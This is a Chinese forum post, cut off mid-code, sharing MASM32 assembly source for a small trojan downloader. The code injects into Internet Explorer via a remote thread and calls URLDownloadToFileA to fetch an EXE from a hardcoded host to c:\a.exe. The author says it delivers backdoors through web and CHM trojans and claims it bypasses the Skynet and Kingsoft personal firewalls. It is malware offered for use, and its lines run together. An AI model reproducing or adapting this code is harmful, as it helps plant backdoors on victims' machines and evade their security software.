大家可能都用过网页木马来下真正的EXE木马吧，但是有些时候后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到）所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数:C:\masm32\BIN>type ii.batml /c /coff i.asmlink /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。; #--------------------------------------# #; # Injection downloadcode in IE --> # #; # -->also it can jump personal fire wall # #; # 2004.07.15 #; # codz: czy # #; #------------------------------------------# # ;test on win2k server sp4 masm8 .386.model flat,stdcalloption casemap:none include ../include/user32.incincludelib ../lib/user32.libinclude ../include/kernel32.incincludelib ../lib/kernel32.libinclude ../include/windows.inc.datahello db ’2K下建远程线程’,0tit db ’IEFrame’,0szFormat db ’PID是:%d’,0szBuffer dd 20 dup(0),0pid dd 0hProcess dd 0hThread dd 0pCodeRemote dd 0path1 db ’c:\a.EXE’,0 .constszmsg db ’URLDownloadToFileA’,0userdll db ’Urlmon.dll’,0;szmsg db ’MessageBoxA’,0;userdll db ’User32.dll’,0szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟kerdll db ’kernel32.dll’,0 .codecodebegin:dispdata db "http://192.168.0.5/NBTreeList.exe",0szTit db "c:\a.exe",0datalen =$-codebeginRproc proc msgbox ;MessageBoxA的地址为参数CALL @F ;push esi@@:POP EBXSUB EBX,OFFSET @BLEA ECX,[EBX dispdata]LEA EDX,[EBX szTit]push NULLpush 0push edxpush ecxpush NULL